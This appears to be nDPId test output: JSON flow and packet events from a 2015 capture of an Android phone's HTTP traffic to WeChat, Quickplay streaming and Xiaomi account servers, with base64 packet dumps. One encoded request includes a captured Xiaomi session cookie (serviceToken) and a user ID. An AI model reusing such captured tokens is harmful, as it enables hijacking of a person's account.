-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} -00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUyOvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhYpgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 